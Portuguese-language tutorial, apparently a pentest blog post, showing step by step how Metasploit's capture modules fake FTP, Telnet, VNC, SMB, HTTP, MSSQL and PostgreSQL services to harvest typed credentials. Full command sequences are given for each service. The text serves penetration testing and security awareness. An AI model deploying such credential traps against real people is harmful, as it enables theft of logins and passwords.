O msfconsole possui um módulo auxiliar que permite que você inicie serviços tais como: FTP, Telnet, VNC, SMB, HTTP, MSSQL, PostgreSQL, entre outros e obter as credenciais que são informadas durante o acesso. Pode ser um recurso interessante para ser utilizado durante o PenTest e/ou ate mesmo para conscientização de segurança.
Inicie o msfconsole utilizando o módulo auxiliar do ftp:
Linuxmsfconsole msf6 > use auxiliary/server/capture/ftp msf6 auxiliary(server/capture/ftp) > set srvhost 192.168.0.100 srvhost => 192.168.0.100 msf6 auxiliary(server/capture/ftp) > set banner Bem vindo ao servidor FTP banner => Bem vindo ao servidor FTP msf6 auxiliary(server/capture/ftp) > exploit
Utilize o nmap para confirmar se a porta 21 está aberta.
Linuxnmap -p21 192.168.0.100
Tente realizar a conexão ao serviço ftp informando um usuário e uma senha.
O objetivo é apenas capturar os dados informados mesmo que estes não estejam corretos.
Linuxftp 192.168.0.100
Dados coletados:
Utilizando o módulo auxiliar do Telnet:
Linuxmsf6 > use auxiliary/server/capture/telnet msf6 auxiliary(server/capture/telnet) > set banner Bem vindo ao servidor Telnet banner => Bem vindo ao servidor Telnet msf6 auxiliary(server/capture/telnet) > set srvhost 192.168.0.100 srvhost => 192.168.0.100 msf6 auxiliary(server/capture/telnet) > exploit
Utilize o nmap para confirmar se a porta 23 está aberta.
Linuxnmap -p23 192.168.0.100
Tente realizar a conexão ao serviço telnet informando um usuário e uma senha.
O objetivo é apenas capturar os dados informados mesmo que estes não estejam corretos.
Linuxtelnet 192.168.0.100
Dados coletados:
Utilizando o módulo auxiliar do VNC:
Linuxmsf6 > use auxiliary/server/capture/vnc msf6 auxiliary(server/capture/vnc) > set srvhost 192.168.0.100 srvhost => 192.168.0.100 msf6 auxiliary(server/capture/vnc) > exploit
Utilize o nmap para confirmar se a porta 5900 está aberta.
Linuxnmap -p5900 192.168.0.100
Tente realizar a conexão ao serviço vnc informando a senha.
O objetivo é apenas capturar a senha mesmo que esta não esteja correta.
Linuxvncviewer 192.168.0.100
Dados coletados:
Utilizando o módulo auxiliar do SMB:
Linuxmsf6 > use auxiliary/server/capture/smb msf6 auxiliary(server/capture/smb) > set srvhost 192.168.0.100 srvhost => 192.168.0.100 msf6 auxiliary(server/capture/smb) > exploit
Utilize o nmap para confirmar se a porta 445 está aberta.
Linuxnmap -p445 192.168.0.100
Tente realizar a conexão via UNC.
Windows\\192.168.0.100
Informe o usuário e senha :
Dados coletados:
Utilizando o módulo auxiliar do HTTP:
Linuxmsf6 > use auxiliary/server/capture/http_basic msf6 auxiliary(server/capture/http_basic) > set RedirectURL fake RedirectURL => fake msf6 auxiliary(server/capture/http_basic) > set srvhost 192.168.0.100 srvhost => 192.168.0.100 msf6 auxiliary(server/capture/http_basic) > set uripath admin uripath => admin msf6 auxiliary(server/capture/http_basic) > exploit
Utilize o browser para acessar a página e em seguida informe um usuário e uma senha.
Navegadorhttp://192.168.0.100/admin
Dados coletados:
Utilizando o módulo auxiliar do MSSQL:
Linuxmsf6 > use auxiliary/server/capture/mssql msf6 auxiliary(server/capture/mssql) > set srvhost 192.168.0.100 srvhost => 192.168.0.100 msf6 auxiliary(server/capture/mssql) > exploit
Utilize o nmap para confirmar se a porta 1433 está aberta.
Linuxnmap -p1433 192.168.0.100
Utilize um client para realizar a conexão com o banco de dados, neste exemplo utilizei o DBeaver
Dados coletados:
Utilizando o módulo auxiliar do PostgreSQL:
Linuxmsf6 > use auxiliary/server/capture/postgresql msf6 auxiliary(server/capture/postgresql) > set srvhost 192.168.0.100 srvhost => 192.168.0.100 msf6 auxiliary(server/capture/postgresql) > exploit
Utilize o nmap para confirmar se a porta 5432 está aberta.
Linuxnmap -p5432 192.168.0.100
Utilize um client para realizar a conexão com o banco de dados, neste exemplo utilizei o DBeaver
Dados coletados: